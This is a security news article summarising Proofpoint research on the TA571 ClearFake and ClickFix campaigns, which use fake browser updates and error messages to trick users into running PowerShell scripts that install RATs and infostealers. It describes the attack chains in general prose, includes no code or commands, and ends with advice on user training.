Threat actors have recently been utilizing fake browser updates and software fixes as a means to deceive users into cutting/copying and pasting PowerShell scripts loaded with various malware strains, including remote access Trojans (RATs) and infostealers, with the ultimate goal of infecting their computers. This socially engineered technique has been observed by researchers from Proofpoint, who tracked the activity back to an initial access broker known as TA571, along with an unidentified actor over the past three months. The activities began as early as March 1 and have been detailed in a blog post published on June 17.
There are two primary methods of social engineering being employed in these campaigns. One method involves offering fake browser updates as part of the ClearFake campaign, while the other method delivers error messages related to popular platforms like Word, Google Chrome, and OneDrive, dubbed “ClickFix” by the researchers. Malware strains being distributed in these campaigns include the DarkGate and NetSupport RATs, the Matanbuchus malware loader, and various information stealers such as Lumma and Vidar.
Overall, the researchers have noted a trend among cybercriminals to adopt increasingly creative attack chains that utilize nested PowerShell scripts and other technical tactics that may not be easily detected by users. They highlighted the use of “clever” and “authoritative” social engineering in the fake error messages to prompt users to take immediate action without considering the risks involved.
One of the observed techniques, known as ClearFake, involves compromised websites that load malicious scripts hosted on the blockchain via Binance’s Smart Chain contracts. This technique, called EtherHiding, leads users to install a “root certificate” under the guise of viewing the website correctly, but in reality, it facilitates malware delivery with strains like the Lumma stealer, Amadey Loader, and JaskaGo.
Another technique, ClickFix, presents users with fake error messages prompting them to fix a faulty browser update by running a PowerShell script that ultimately results in the installation of the Vidar stealer. While the payload domain used in this campaign was taken offline shortly after discovery, the researchers noticed a link with the ClearFake injection that remained active.
TA571, the initial access broker behind these campaigns, has been observed utilizing similar attack chains since March 1, targeting thousands of organizations globally with emails containing malicious attachments and deceptive error messages aimed at installing malware like Matanbuchus or DarkGate.
To mitigate the risk of malware compromise, Proofpoint has provided a list of indicators of compromise (IoCs) related to these campaigns. The researchers emphasized that user awareness and training are crucial in preventing successful attacks, urging organizations to train their employees to identify and report suspicious activity to security teams. By integrating such specific training into existing user training programs, organizations can enhance their overall security posture against such deceptive tactics employed by threat actors.